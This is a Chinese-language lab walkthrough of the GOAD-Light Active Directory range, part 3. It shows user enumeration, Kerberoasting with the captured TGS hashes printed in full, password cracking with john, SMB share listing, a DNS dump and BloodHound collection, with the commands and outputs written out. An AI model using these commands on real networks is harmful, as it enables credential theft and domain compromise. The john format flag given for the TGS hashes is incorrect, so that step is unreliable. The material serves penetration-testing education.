GOAD-Light-Part3-用户枚举

GOAD-Light_schema

列出用户

  • 在上一部分,我们获得了一些用户凭据
  • 当您在活动目录上获得一个帐户时,要做的第一件事总是获得完整的用户列表
  • 域内的任何普通认证用户,默认都有权限读取 Active Directory 中的绝大多数信息(用户、组、计算机等)。
  • 一旦你得到它,你就可以在完整的用户列表上进行密码喷洒(你经常会发现其他帐户的密码很弱,比如 username=password、SeasonYear!、SocietynameYear! 甚至 123456)

使用GetADUsers

1
impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Name                  Email                           PasswordLastSet      LastLogon        
--------------------  ------------------------------  -------------------  -------------------      
Administrator                                         2026-01-19 09:34:50.134674  2026-01-19 12:21:19.905572
Guest                                                                                            
vagrant                                               2021-05-12 07:38:55.922520  2026-01-19 12:35:28.841680 
krbtgt                                                2026-01-19 10:35:49.810135  
                                                      2026-01-19 10:45:49.918582  
arya.stark                                            2026-01-19 10:52:42.105948  2026-01-21 03:19:41.983083 
eddard.stark                                          2026-01-19 10:52:45.526683  2026-01-21 03:30:14.230322
catelyn.stark                                         2026-01-19 10:52:48.633203   
robb.stark                                            2026-01-19 10:52:51.773736  2026-01-21 03:31:27.464624
sansa.stark                                           2026-01-19 10:52:54.806231       
brandon.stark                                         2026-01-19 10:52:58.102719  2026-01-20 11:03:09.129559
rickon.stark                                          2026-01-19 10:53:01.336615  
hodor                                                 2026-01-19 10:53:04.303499 
jon.snow                                              2026-01-19 10:53:07.368009 
samwell.tarly                                         2026-01-19 10:53:10.495621 
jeor.mormont                                          2026-01-19 10:53:13.524535
sql_svc                                               2026-01-19 10:53:16.602142  2026-01-21 02:26:11.538802

使用CME

1
crackmapexec smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local 192.168.56.11 --users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~/GOAD]                                                                       
└─$ crackmapexec smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local 192.168.56.11 --users  
[*] First time use detected                                                 
[*] Creating home directory structure                                        
[*] Creating default workspace                                             
[*] Initializing SSH protocol database                                     
[*] Initializing MSSQL protocol database                                   
[*] Initializing WINRM protocol database                                  
[*] Initializing SMB protocol database                                      
[*] Initializing LDAP protocol database                                     
[*] Initializing RDP protocol database                                     
[*] Initializing FTP protocol database                                     
[*] Copying default configuration file                                     
[*] Generating SSL certificate                                             
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)                    
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB         192.168.56.11   445    WINTERFELL       [+] Enumerated domain user(s)                    
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\sql_svc                        badpwdcount: 0 desc: s                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\jeor.mormont                   badpwdcount: 1 desc: J                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\samwell.tarly                  badpwdcount: 1 desc: S                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\jon.snow                       badpwdcount: 1 desc: J                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\hodor                          badpwdcount: 0 desc: B                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\rickon.stark                   badpwdcount: 0 desc: R                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\brandon.stark                  badpwdcount: 1 desc: B                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\sansa.stark                    badpwdcount: 0 desc: S                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\robb.stark                     badpwdcount: 0 desc: R                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\catelyn.stark                  badpwdcount: 1 desc: C                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\eddard.stark                   badpwdcount: 0 desc: E                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\arya.stark                     badpwdcount: 0 desc: A                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\krbtgt                         badpwdcount: 0 desc: K                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\vagrant                        badpwdcount: 0 desc: V                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\Guest                          badpwdcount: 1 desc: B                                                       
SMB         192.168.56.11   445    WINTERFELL       north.sevenkingdoms.local\Administrator                  badpwdcount: 1 desc: B

LDAP查询

1
ldapsearch -H ldap://192.168.56.11 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
distinguishedName: CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=Guest,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=vagrant,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=SEVENKINGDOMS$,CN=Users,DC=north,DC=sevenkingdoms,DC=loc
distinguishedName: CN=arya.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=catelyn.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=robb.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=brandon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=rickon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=hodor,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=jeor.mormont,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local

通过 LDAP 查询,我们可以请求其他域的用户,因为存在信任关系。

在 sevenkingdoms.local 上

1
ldapsearch -H ldap://192.168.56.10 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"

父域用户结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sevenkingdoms.local
├── CN=Users (默认容器)
│   ├── Administrator
│   ├── Guest
│   ├── vagrant
│   ├── krbtgt
│   └── NORTH$ (子域计算机账户)
├── OU=Crownlands (王领地)
│   ├── tywin.lannister
│   ├── jaime.lannister
│   ├── cersei.lannister
│   ├── robert.baratheon
│   ├── joffrey.baratheon
│   ├── renly.baratheon
│   ├── stannis.baratheon
│   ├── petyer.baelish
│   ├── lord.varys
│   └── maester.pycelle
└── OU=Westerlands (西境)
    └── tyron.lannister
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
distinguishedName: CN=Administrator,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=Guest,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=vagrant,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=krbtgt,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=NORTH$,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=ESSOS$,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=tywin.lannister,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=jaime.lannister,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=cersei.lannister,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=robert.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=joffrey.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=loca
distinguishedName: CN=renly.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=stannis.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=loca
distinguishedName: CN=petyer.baelish,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=lord.varys,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=maester.pycelle,OU=Crownlands,DC=sevenkingdoms,DC=local

Kerberoasting

Kerberos协议

Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议

它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证

在Kerberos协议中主要是有三个角色的存在:

  1. 访问服务的Client(以下表述为Client 或者用户)
  2. 提供服务的Server(以下表述为服务)
  3. KDC(Key Distribution Center)密钥分发中心 kerberos 测试工具介绍

其中KDC服务默认会安装在一个域的域控中,而Client和Server为域内的用户或者是服务,如HTTP服务,SQL服务在Kerberos中Client是否有权限访问Server端的服务由KDC发放的票据来决定

image-20260121164414122

  1. AS_REQ: Client向KDC发起AS_REQ,请求凭据是Client hash加密的时间戳
  2. AS_REP: KDC使用Client hash进行解密,如果结果正确就返回用krbtgt hash加密的TGT票据,TGT里面包含PAC,PAC包含Client的sid,Client所在的组
  3. TGS_REQ: Client凭借TGT票据向KDC发起针对特定服务的TGS_REQ请求
  4. TGS_REP: KDC使用krbtgt hash进行解密,如果结果正确,就返回用服务hash 加密的TGS票据(这一步不管用户有没有访问服务的权限,只要TGT正确,就返回TGS票据)
  5. AP_REQ: Client拿着TGS票据去请求服务
  6. AP_REP: 服务使用自己的hash解密TGS票据如果解密正确,就拿着PAC去KDC那边问Client有没有访问权限,域控解密PAC获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限

SPN

SPN简介

SPN(ServicePrincipal Names)服务主体名称,是服务实例(比如:HTTP、MSSQL、MySQL等服务)的唯一标识符 SPN是服务器上所运行服务的唯一标识,每个使用Kerberos的服务都需要一个SPN

SPN分为两种,一种注册在AD上机器帐户(Computers)下,另一种注册在域用户帐户(Users)下

当一个服务的权限为Local System或Network Service,则SPN注册在机器帐户(Computers)下

当一个服务的权限为一个域用户,则SPN注册在域用户帐户(Users)下

SPN的格式:

1
serviceclass/host:port/servicename
  1. serviceclass可以理解为服务的名称,常见的有www, ldap, SMTP, DNS, HOST等
  2. host有两种形式,FQDN和NetBIOS名,例如server01.test.com和server01
  3. 如果服务运行在默认端口上,则端口号(port)可以省略

kerberoasting

通过SPN发现服务(比如MSSQL)

具有域内普通用户权限

向SPN服务进行交互,请求Kerberos票据(当用户的TGT被验证为有效时,TGS会向用户发送一张票据,该票据使用与SPN关联服务的计算机服务账号相同的NTLM Hash,比如MSSQL账户的Hash)

根据字典爆破生成Hash,去尝试打开该Kerberos票据

如果成功,则获得了MSSQL服务账户的密码

攻击者可以伪造TGS白银票据,在TGS中标识访问账号为域管理员账号 从而获取服务的域管理员访问权限

或者用于委派攻击(服务账号大多都会被设置委派,如果是非约束委派,则获取服务账号的口令后,可直接获取域管理员权限)

使用impacket

1
impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/GOAD]                                                                                                                                                                  
└─$ impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes                                            
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation                                                                                                                                  
                                                                                                                                                                                          
ServicePrincipalName                                 Name         MemberOf                                                    PasswordLastSet             LastLogon                   Dele
gation                                                                                                                                                                                    
---------------------------------------------------  -----------  ----------------------------------------------------------  --------------------------  --------------------------  ----
-------                                                                                                                                                                                   
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local        2026-01-19 10:52:54.806231                           
                                                                                                                                                                                          
CIFS/winterfell.north.sevenkingdoms.local            jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-01-19 10:53:07.368009                       cons
trained                                                                                                                                                                                   
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-01-19 10:53:07.368009                       cons
trained                                                                                                                                                                                   
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                  2026-01-19 10:53:16.602142  2026-01-21 02:26:11.538802      
                                                                                                                                                                                          
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                  2026-01-19 10:53:16.602142  2026-01-21 02:26:11.538802

使用cme

1
crackmapexec ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(kali㉿kali)-[~/GOAD]                                                                                                                                                                  
└─$ crackmapexec ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING                                                       
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)                    
LDAP        192.168.56.11   389    WINTERFELL       [+] north.sevenkingdoms.local\brandon.stark:iseedeadpeople                                                                            
LDAP        192.168.56.11   389    WINTERFELL       [*] Total of records returned 5                                                                                                       
CRITICAL:impacket:CCache file is not found. Skipping...                                                                                                                                   
LDAP        192.168.56.11   389    WINTERFELL       sAMAccountName: sansa.stark memberOf: CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local pwdLastSet: 2026-01-19 10:52:54.806231 last
Logon:                                                                                                                                                                             
LDAP        192.168.56.11   389    WINTERFELL       $krb5tgs$23$*sansa.stark$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sansa.stark*$cbd325769c78bbe4144ba864b05b211e$dad51c15b1a
b748af4ea5ff8a0c0ed2455e887e9717546712f6cbd9b72cc48797ec3d99c1414f2bd7d8b77006a9e1b359c02dda4fc8ee2acd4ab95b69754dc07755548eeeb5cf2cdb91137797c561f53f6f5f89f9b82a06ce5309e5885cbd151c664c
f0c4e201d6e42e7ba1471963bf65227ffb8358e784aedc5959c3861ccd1a0652f38e15a44e4b9dcab8b34f15cd351b69b5b4c3efc0cda3ccc48c5c6da69b78f5f1595dccc36389293f93582862d3af10ffc42c1a7959a5e31544ce7ef2
04fb409f1f6e46796123af44592f8702c965ca8498497c51f4e2429355f4f3647f6961c097248904ab2dec2bbb11c054166b9ed194a165aff8ab034a6bfa04fa528de93c224d64ff4339f19d8297de8628dde9b3d7a89e2d74fc4492a7
b4b516ce956e2fbc881e76e649840b7cf084fc610fa79ef01fec9c6f66386988343ad17605064922608e48203d266f05a796bdceeb2a1f79aad435948cfc5a3ec2bbcf2ca40fe9ba4bcdbfcd33116760f4b0bd5b42ba88d673b72fbf36
952a2110272d2379993fe6706b99fbf7595bc7d36a97fc4a8b39683bd860b066ab4025a1e015874110f35d60dffea1a4f4a7b1913e1aa75c3c68a43dcacca45952b0a7751c5058b23df4d03ca032d68703ee8a8ded37eb4d620abb466d
0a629cefde2ad3b97ea1702d39c71a8c3fb2e136be92968fb247b7cc938c61f04ebfbb568ba70692b2b2f7d36d8304c052678b759db5939454e0ec3b28b9e4887f77ae80c547bd3462ba5eb9d4b2039067863d5e47daef7674ec4c6d79
431845a2be6d02ddce292068d7f48f926f5f165b9e788f5a66b169a9a4a2be3ecc4bc6f00a0bcd6f4d29543518cbe59484bb010bd1c4e214fcbe6828a0e4d81565ee9da437cdac1321bc59cc3b20530e47613e639285a697951fed0dbc
6fe1d3d4067b31d7da80741a46e38f435144e1cf9e958f22eac3b5e659f65cc96d78242db098da0bc42a6f48e564f4070e4a816d536f094824d0270818b4cbc873d7d94c8b227d5c93bd5edf8a7121235df6ac3fd3907667124663016f
00429238eb78858d23e3a2f16452dcb59f10a63ca4ae64d220ccd77d1a18be8b85e4c19103510f8236b75234a316436d96f22230bbb42442a128ed4bf28630ee14ebcfdd8d17f057ebc952c816c953a2503c288cfaf36c9bf8fdd6406f
8140f28e38aeef125c784e46b337807c8394669a354062a9b7f39dce61e7a86d1ed4ea68efdf2e0ccde445dc8ff4b401702c0469c403e4a88a2bee65b65080b4297ad5670975fa49247336f486259a439fe13f25ef5fbaca93c185c319
fe11033d200e994a7e94facc88614694470e484543cc6273c83225dd94ee9b01f579619f237afe73882e0dd486d3aebb1611d843b46e765c6abf58a227ac5d4ee4c2882ff683114e6cd65f0dd46503cb4c8ded2cf3e8038ea0770c1d2a
966cd166c949d242cf44d78404ff5457ee9ac0fa61de894271fce9c031a9b1477215450693a92dc3002ec                                                                                                     
LDAP        192.168.56.11   389    WINTERFELL       sAMAccountName: jon.snow memberOf: CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local pwdLastSet: 2026-01-19 10:53:07.368009 l
astLogon:                                                                                                                                                                          
LDAP        192.168.56.11   389    WINTERFELL       $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/jon.snow*$31349c128569f1773d4689090fde555d$51f7d0d89fcea6cf3
b0c42a1cd0889a8146259ad814ea1371b3f0fbbf8357d874f811fea5e9c79987bfd15598d930ad51436a43c838fe83edf3bc9fa3ce506c6c50f3fde9fb908a8091caee8b7811d21f2e26c7831d7b17cbd27be52f144923a0d9db8a6f68
58bf1ba5c374d6218175ecaf2586885995af5f390caf77fd760fdd05974708f14319281bad7741529b1f75198c84de55823309424121f4e3e30a8c5a48479eeef5b1e2ea3bf582f2c81821be5c248d21caf295d168c8568b1113516dbb
16505acc8ae8747281f0e2151faa5939be91013db2d0d679ea0246114a6758af3820a907181c1da3dc676f4feb4df720661c89ee28d7429a18c5d6d5dd46d97c2d80bd8a5e1518896be1494e0083791011c2b5bfd2daf4218471624970
423f6d1e1a80bbd3eb51227d5c2c4948fd9b3e2e0cad6727510bb6adff2a97e4005c1eb032f6c96677e71c5f3b8d4d4deb1adde02535300013ed708584599ab05a950825c5b513966bbad5dad07b580fd77ce6e87ae40a76f5be49214a
5ea4719b0f9e033e08b69b188d435deefe172f4cfcfe9c9594632632eeae34ae07dee9abaaf8ba6d058893714fa1bb052bddd13e13da90443e7bdfaa35e2aa9bfc0d851900237d8daf61f9ae3f06dc1c7c8782f9d039e8fd220ddaa465
66548cb53d81359feae1a1f4fcabb811a4c65d84304e0963b3bd4308bad5f358e79d278ff676633dcd5c7a4aca77662a2d9bfb0ee2d37874c5a1d0fa0e868f286f9fa8a7e50846eff13edceba2f7163644d5b32f1a1c342cd53a03f742
8e5806d7703e2edce41df44828c110a4eb89ffbff1268f19c4d21ce347c93d42bafde6770f6d95e7b86027279b09c094852546bbc85a88860d5e08b2d39066b22fb2c550155c7dfb1c7a18567a1dd90c6cf6ee1dfc34759158e7689f33
07876c5ff653ec8aaab3c47327e4a42d4089e0c50e670ca35d01da2195e4347f7190463f0fac374072f3ffc22938f10578e55af8bafb9d24be02fb1dafa87943d9fa89198da767552d6c2ee9b1b3dbe0c2086cfb584c7e89629b0662d1
e20f21c4ae9d8bc87bc2588c608d8e4f5cbb2c0e7f2f688d3c74991581943608e418b921d09a89f720a5dae2fe53db36629753ee93141765c2cb786bf5224c3529da014841ad832caedfcd80f0e2807f33b0a7235110a91ca43a99738d
8ed5273cebd5489c7632197b9435ecd3d5fb50f9d80650f64f2c0c00a68016e4a25154bff34df31f69dde1d7871f6f2bc9fbaad478e0f3a1822d10057f838fb3308ea034f040bc0ff8bfc7f93c190e26c2a85d2fa8a8c689831064bf26
1df2d5923e8759e270dcd7ce5f02eac1b470b6cdf912b8fc494dea9be92fa8ec80ae2f8a53c747a3ee90610db1daad70453018b3812bb89e2cb0a404b7e638c6f65da2e467385abf6d243199345cf1bea0667855b3cbc8cc9c88535f11
70073e77f8f58982defe5e213e5e68bdf3321e029976c9d070aed2a39b154c3d461d1c4afe7715d                                                                                                           
LDAP        192.168.56.11   389    WINTERFELL       sAMAccountName: sql_svc memberOf:  pwdLastSet: 2026-01-19 10:53:16.602142 lastLogon:2026-01-21 02:26:11.538802                        
LDAP        192.168.56.11   389    WINTERFELL       $krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$north.sevenkingdoms.local/sql_svc*$4d4431ce6ec6ccf02494f3396fb4e83c$b83cb1bb603118ca87b
568c1bfac35c5b27dbff9ca5dd8ae2952f6fb4c52752737e965d4b38fe12fb524a7462fa269220169f6906d12d46b4f94ee69965abcfa2f0b5d0570e388967cc125fc0539313b113bd328e0db279d96478261f228c4515ab58247fe1eb
4ac2a2ac5408074fe064e29c9bc816b50bf54733ca8b0910c402c3d59643e6f699d1b1567c4838804b2758df8f3f5f2d9076df6b8d99ee950c29bb64292b7b2df01a2c86aecdc78add900f7636e5c4dd6a0ac2b13cda067aeaff983db7
05811b09b9223045345854c569fac3d6db86f6007865f151252a75a6e0e9f7561515c85ca8b51c0b830f87af22272c3bf30be4cadbdb9a508b40e1cb9d0ec11064add2c8530e9f7ad2fe9c2fa7096457f8bdf906e2fb39e47f7b3cf4c2
88f2d702f06004c567ea126b144f0cb75f65445193004277ce233a63475e492b7d92f707f9229fd0ebc88036927a4fac7effbec3609b20a92a9ee5509c3dc44cb06995fad2fd3e429c5cb1b078d73e8bf347197c6ba5bf48038624f9c0
2253fc6629ef42d1b613215de3af71c33fd4f34a748e62a074a91c7d606a4e5e0c55e12bce73e0a5c219da54f24438259fe91ef492f19c261ea242c422c0978274adc6c6cdec3c86f994bff051008409a7101218142f28a890ea0db5d6
b70f28f6291351cd225a1437b6b8ff984e63f230bd7fe0cfb61b3cbc09c3599483a0b006ba7ee1393bdd8d366744adbeb669c8acd95684d0e5024e900484b6e10cd5fa16e076b9580b4d17ce439d9b9649603c19acb72e113115a29220
1813aa3fb1fbc75434eef46f6f28db26f6a6cdd631c8577b7c27ea7b90ad9034af40f3eaaef0c495b5519d7bfe4cf70aa86036ae09601448d4adfb7f9d75692477f38c4da33ea59af3281d7b0a458edb4f2689f91638286028c2509ae4
fc6209fca2232f8d61ef270e20f8696ccf79975d149edac68a9faceb173c02936180aecb82fa6660f43831a645de95bba78e530c4df421ea476bcc6619a288a5234864546fcbc1cf2027c6f9571ff13626671379e52422cfa311e4b0ab
d2617104cba0d0d012a97508ab7f8a5221bc0a73eee283ddce7fdc8b547e28b8fe8f0afd22f3302a11bee1b19946bc4ee46f35e56ba8499f6aa1fe7932469f457f4e3a1f89450d6400396e15fd1e05ef9db1de3d404281a38763ed136a
1aaf3debbaefb0d1cd6f817899039cc24fb341dcbce3461ae3eba65dd7ca0535ea4cc99974710e060052b400cb26c665891878956c475940b55489a2fd349443bcf8dfa1949f5c42329be62f35d0d34aa1a9aafb6efdb12410b771bf3d
aa35b138468744ca9ca40dc4eb180d998e069862f199449d927a5ad1352bf49ae323bf2569f5dad20fb5293ade75599fa10d2521693d6431a2e11686c56a46c491661eb010236207f62b8efb1a1e8248f563e964162769683841f9a51e
3be962c332ca0f574be36f682cc3bbb55ddc1ef65aba8fb9400e5ef9a187077d614392380f051

使用john破解

1
john --wordlist=/usr/share/wordlists/rockyou.txt KERBEROASTING --format=krb5asrep

成功获取另一个用户凭据

1
north.sevenkingdoms.local\jon.snow:iknownothing

共享枚举

使用刚才的获得账号密码尝试,有个新的共享文件夹是可读的(在该靶场里什么都没有,但在真正的渗透中可能会经常得到有趣的信息)

1
crackmapexec smb 192.168.56.10-22 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(kali㉿kali)-[~/GOAD]                                                                                                                                                                  
└─$ crackmapexec smb 192.168.56.10-22 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares                                                                                   
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)                    
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)                  
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)                  
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\jon.snow:iknownothing                                                                                   
SMB         192.168.56.11   445    WINTERFELL       [+] Enumerated shares                                                                                                                 
SMB         192.168.56.11   445    WINTERFELL       Share           Permissions     Remark                                                                                                
SMB         192.168.56.11   445    WINTERFELL       -----           -----------     ------                                                                                                
SMB         192.168.56.11   445    WINTERFELL       ADMIN$                          Remote Admin                                                                                          
SMB         192.168.56.11   445    WINTERFELL       C$                              Default share                                                                                         
SMB         192.168.56.11   445    WINTERFELL       IPC$            READ            Remote IPC                                                                                            
SMB         192.168.56.11   445    WINTERFELL       NETLOGON        READ            Logon server share                                                                                    
SMB         192.168.56.11   445    WINTERFELL       SYSVOL          READ            Logon server share                                                                                    
SMB         192.168.56.22   445    CASTELBLACK      [+] north.sevenkingdoms.local\jon.snow:iknownothing                                                                                   
SMB         192.168.56.10   445    KINGSLANDING     [+] north.sevenkingdoms.local\jon.snow:iknownothing                                                                                   
SMB         192.168.56.22   445    CASTELBLACK      [+] Enumerated shares                                                                                                                 
SMB         192.168.56.22   445    CASTELBLACK      Share           Permissions     Remark                                                                                                
SMB         192.168.56.22   445    CASTELBLACK      -----           -----------     ------                                                                                                
SMB         192.168.56.22   445    CASTELBLACK      ADMIN$                          Remote Admin                                                                                          
SMB         192.168.56.22   445    CASTELBLACK      all             READ,WRITE      Basic RW share for all                                                                                
SMB         192.168.56.22   445    CASTELBLACK      C$                              Default share                                                                                         
SMB         192.168.56.22   445    CASTELBLACK      IPC$            READ            Remote IPC                                                                                            
SMB         192.168.56.22   445    CASTELBLACK      public          READ            Basic Read share for all domain users                                                                 
SMB         192.168.56.10   445    KINGSLANDING     [+] Enumerated shares                                                                                                                 
SMB         192.168.56.10   445    KINGSLANDING     Share           Permissions     Remark                                                                                                
SMB         192.168.56.10   445    KINGSLANDING     -----           -----------     ------                                                                                                
SMB         192.168.56.10   445    KINGSLANDING     ADMIN$                          Remote Admin                                                                                          
SMB         192.168.56.10   445    KINGSLANDING     C$                              Default share                                                                                         
SMB         192.168.56.10   445    KINGSLANDING     CertEnroll      READ            Active Directory Certificate Services share                                                           
SMB         192.168.56.10   445    KINGSLANDING     IPC$            READ            Remote IPC                                                                                            
SMB         192.168.56.10   445    KINGSLANDING     NETLOGON        READ            Logon server share                                                                                    
SMB         192.168.56.10   445    KINGSLANDING     SYSVOL          READ            Logon server share

DNS 转储

Active Directory 集成 DNS 转储工具

利用当前获取的域用户权限,把整个域内所有的 DNS 解析记录全部读取出来的过程。

AD 集成 DNS 允许认证用户列出区域内的所有记录。

默认情况下,Active Directory 中的任何用户都可以枚举域或林 DNS 区域中的所有 DNS 记录,类似于区域传输,此工具启用区域中所有 DNS 记录的枚举和导出,用于内部网络的侦察目的

1
adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local
1
2
3
4
5
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 5 records
1
2
3
4
5
6
type,name,value
A,winterfell,192.168.56.11
A,DomainDnsZones,192.168.56.11
?,castelblack,?
NS,@,winterfell.north.sevenkingdoms.local.
A,@,192.168.56.11

Bloodhound

参考链接

https://en.hackndo.com/bloodhound/#going-further

  • Boodhound 是活动目录渗透测试的最佳工具之一,此工具将帮助您找到破解 AD 的所有路径,是您武器库中的必备工具!
  • 要启动 bloodhound,您首先需要从不同的域中检索所有数据

Linux环境,直接用python脚本:

https://github.com/fox-it/BloodHound.py

Windows环境,可以用:

https://github.com/BloodHoundAD/SharpHound

RustHound支持ADCS收集:

https://github.com/OPENCYBER-FR/RustHound

安装

1
sudo apt install bloodhound.py -y

收集信息

1
bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -ns 192.168.56.10
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)                                                                                                                        
INFO: Found AD domain: north.sevenkingdoms.local                                                                                                                                          
WARNING: Could not find a global catalog server, assuming the primary DC has this role                                                                                                    
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc                                                                                   
INFO: Getting TGT for user                                                                                                                                                                
